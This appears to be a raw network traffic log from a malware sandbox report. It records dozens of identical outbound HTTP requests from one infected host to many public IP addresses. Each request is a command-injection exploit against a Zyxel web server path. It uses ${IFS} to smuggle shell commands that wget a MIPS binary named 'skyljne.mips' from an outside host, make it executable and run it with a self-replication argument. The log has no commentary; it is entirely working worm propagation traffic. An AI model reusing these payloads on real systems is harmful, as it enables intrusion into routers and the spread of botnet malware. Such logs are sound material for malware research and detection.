                                                Jan 12, 2024 18:16:41.892199993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9218192.168.2.233833878.90.75.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892247915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9219192.168.2.234365471.130.214.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892281055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9220192.168.2.234716078.253.202.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892330885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9221192.168.2.2341804217.4.150.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892385006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9222192.168.2.236024477.133.153.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892415047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9223192.168.2.2335630133.53.228.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892448902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9224192.168.2.2344852166.136.254.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892492056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9225192.168.2.234285060.185.48.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892543077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9226192.168.2.235403020.116.111.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892584085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9227192.168.2.2352648204.241.236.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892612934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9228192.168.2.2351560201.198.31.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892653942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9229192.168.2.2354172198.14.108.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892695904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9230192.168.2.235056098.250.211.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892764091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9231192.168.2.2335092181.81.170.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892793894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9232192.168.2.2347020128.178.161.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892819881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9233192.168.2.233329474.198.184.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892889023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9234192.168.2.234493899.190.138.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892920017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9235192.168.2.23382424.86.99.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892956018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9236192.168.2.235060425.213.172.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893013000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9237192.168.2.234995271.216.133.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893038988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9238192.168.2.2346352113.131.101.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893064976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9239192.168.2.2353836114.227.255.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893137932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9240192.168.2.2359110191.99.111.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893171072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9241192.168.2.235853819.206.133.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893220901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9242192.168.2.2350154184.64.55.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893271923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9243192.168.2.2353156190.180.101.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893276930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9244192.168.2.2342580103.222.196.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893340111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9245192.168.2.23351364.167.168.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893364906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9246192.168.2.2341784110.200.155.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893409014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9247192.168.2.2344118122.211.4.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893449068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9248192.168.2.2333778151.231.11.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893475056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9249192.168.2.234807244.209.204.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893510103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9250192.168.2.2352580119.222.199.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893562078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9251192.168.2.2353852186.219.197.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893601894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9252192.168.2.235565638.251.21.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893631935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9253192.168.2.2344570158.7.68.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893675089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9254192.168.2.2333696187.136.94.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.893719912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9255192.168.2.235863023.154.33.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913121939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9256192.168.2.2339828104.102.144.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913178921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9257192.168.2.234484412.97.163.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913203001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9258192.168.2.235184098.206.208.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913259983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9259192.168.2.2354124221.205.129.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913304090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9260192.168.2.234202220.138.213.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913355112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9261192.168.2.2349706169.125.181.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913379908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9262192.168.2.2336002183.68.236.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913427114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9263192.168.2.2351956122.151.242.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913470030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9264192.168.2.2347892160.34.179.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913520098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9265192.168.2.235742641.159.129.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913564920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9266192.168.2.2357950103.125.51.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913587093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9267192.168.2.234983874.108.205.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913614035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9268192.168.2.236086273.11.10.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913640022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9269192.168.2.2336034120.230.17.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913662910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9270192.168.2.234703879.166.232.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913716078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9271192.168.2.2356524102.106.212.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913746119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9272192.168.2.235929612.239.15.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913789034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9273192.168.2.2345460207.25.176.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913825035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9274192.168.2.233903250.143.66.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913866043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9275192.168.2.234679866.45.190.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913918018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9276192.168.2.234402279.169.80.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913944960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9277192.168.2.233392481.199.201.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.913995981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9278192.168.2.234902231.222.6.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914007902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9279192.168.2.234984623.240.162.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914061069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9280192.168.2.2346312222.70.157.57443
                                                TimestampBytes transferredDirectionData
